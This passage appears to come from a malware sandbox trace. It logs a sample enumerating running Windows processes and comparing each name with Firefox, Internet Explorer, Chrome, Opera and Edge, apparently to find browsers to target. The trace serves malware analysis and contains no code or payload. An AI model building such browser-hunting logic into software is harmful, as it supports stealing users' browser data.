cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0225.463] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0225.463] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0225.463] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0225.463] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0225.463] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.463] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0225.464] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0225.464] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0225.464] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0225.464] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0225.464] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.464] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0225.465] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0225.465] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0225.465] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0225.465] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0225.465] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.465] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0225.465] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0225.465] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0225.465] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0225.465] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0225.465] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.465] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0225.466] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0225.466] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0225.466] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0225.466] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0225.466] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.466] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0225.466] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0225.466] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0225.466] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0225.466] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0225.466] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.466] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0225.467] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0225.467] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0225.467] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0225.467] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0225.467] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.467] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0225.468] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0225.468] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0225.468] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0225.468] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0225.468] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.468] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.468] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0225.468] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0225.468] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0225.468] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0225.468] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.468] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.469] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0225.469] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0225.469] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0225.469] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0225.469] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.469] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.469] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0225.469] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0225.469] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0225.469] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0225.469] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.469] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.470] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0225.470] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0225.470] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0225.470] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0225.470] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.470] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.470] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0225.471] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0225.471] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0225.471] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0225.471] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.471] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0225.471] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0225.471] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0225.471] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0225.471] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0225.471] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.471] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.472] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0225.472] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0225.472] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0225.472] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0225.472] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.472] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.472] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0225.472] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0225.472] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0225.472] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0225.472] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.472] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0225.473] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0225.473] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0225.473] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0225.473] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0225.473] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.473] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0225.473] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0225.474] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0225.474] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0225.474] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0225.474] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.474] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0225.474] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0225.474] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0225.474] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0225.474] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0225.474] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.474] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.475] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0225.475] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0225.475] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0225.475] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0225.475] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.475] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0225.475] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0225.475] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0225.475] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0225.475] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0225.475] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.475] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0225.476] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0225.476] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0225.476] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0225.476] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0225.476] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.476] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0225.477] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0225.477] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0225.477] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0225.477] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0225.477] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.477] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0225.477] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0225.477] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0225.477] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0225.477] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0225.477] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.477] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0225.478] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0225.478] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0225.478] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0225.478] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0225.478] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.478] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0225.479] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0225.479] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0225.479] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0225.479] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0225.479] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.479] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0225.480] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0225.480] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0225.480] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0225.480] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0225.480] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.480] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0225.480] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0225.480] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0225.480] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0225.480] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0225.480] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.481] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0225.481] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0225.481] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0225.481] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0225.481] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0225.481] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.481] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0225.482] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0225.482] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0225.482] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0225.482] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0225.482] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.482] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0225.483] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0225.483] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0225.483] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0225.483] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0225.483] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.483] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0225.483] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0225.483] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0225.483] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0225.483] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0225.483] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.483] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0225.484] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0225.484] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0225.484] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0225.484] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0225.484] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.484] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0225.485] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0225.485] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0225.485] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0225.485] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0225.485] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.485] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0225.486] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0225.486] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0225.486] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0225.486] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0225.486] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.486] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0225.486] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0225.486] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0225.486] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0225.486] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0225.486] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0225.486] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0225.487] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0225.487] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0225.487] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0225.487] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0225.487] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0225.487] Process32Next (in: hSnapshot=0xe8, 